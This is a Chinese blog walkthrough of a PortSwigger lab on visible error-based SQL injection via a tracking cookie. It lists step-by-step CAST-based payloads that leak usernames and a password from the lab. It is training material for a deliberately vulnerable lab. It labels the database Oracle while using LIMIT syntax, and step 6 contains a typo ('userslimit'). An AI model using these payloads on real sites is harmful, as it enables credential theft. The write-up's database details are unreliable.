burpsuite靶场----SQL注入13----oracle的CAST报错注入

靶场地址

https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based

正式开始

1.通过在TrackingId=JBhlRizkqfo87Hq8后面添加'和''(两个单引号)猜测是oracle数据库
添加'报错,添加''不报错


2.然后在TrackingId=JBhlRizkqfo87Hq8后面添加
' and cast((select 1) as int)--

3.发现报错,and后需要bool值,
cast((select 1) as int)获取到了1,但这个1是int类型,所以在前面填上1=,变为1=cast((select 1) as int)，最终1=1获取到了bool值1
' and 1=cast((select 1) as int)--
相当于' and 1--,显示所以内容

4.然后再使用payload
' and 1=cast((select username from users) as int)--
注意TrackingId=JBhlRizkqfo87Hq8中的JBhlRizkqfo87Hq8内容要删掉

5.发现报错,说是返回列数大于1,这时需要用limit 1限制
' and 1=cast((select username from users limit 1) as int)--

6.然后报错出密码 smq5b25jw93pwvfx0phd
' and 1=cast((select password from userslimit 1) as int)--

7.登录

本栏目推荐文章
• SQL Server 检测是不是数字型数据的两种方法
• SQL Join的一些总结
• SQL Server 高性能写入的一些总结
• 网络攻击技术开篇——SQL Injection
• oracle清除日志
• SQL SERVER日期时间转字符串
• sql server 保留2位小数
• DBEAVER 23.0.2 调整SQL编辑器字体大小 ver:20240112
• 用友 U9 【料品表】全字段Sql输出
• sql server 2012配置备份

靶场 burpsuite oracle CAST SQL靶场burpsuite oracle cast 靶场burpsuite信息sql 靶场burpsuite时间oracle 靶场burpsuite数据sql 靶场 外带burpsuite oracle 靶场burpsuite where sql 靶场 布尔burpsuite oracle 靶场burpsuite oracle union 靶场burpsuite order sql 靶场xml-bypass burpsuite oracle